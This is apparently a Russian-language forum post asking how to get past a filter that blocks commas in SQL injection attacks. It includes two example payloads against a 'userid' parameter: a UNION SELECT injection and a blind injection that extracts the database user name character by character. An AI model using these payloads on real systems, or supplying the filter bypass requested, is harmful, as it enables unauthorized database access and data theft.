Доброго времени суток всем уважаемым!

Подскажите плз, как можно обойти фильтрацию ',' (запятая) в sql при выполнении запросов типа

userid=10+UNION+SELECT+1,2,3,4,5,6/*
и
userid=10+and+ASCII(SUBSTRING(user(),1,1))>0/*

Заранее всем благодарен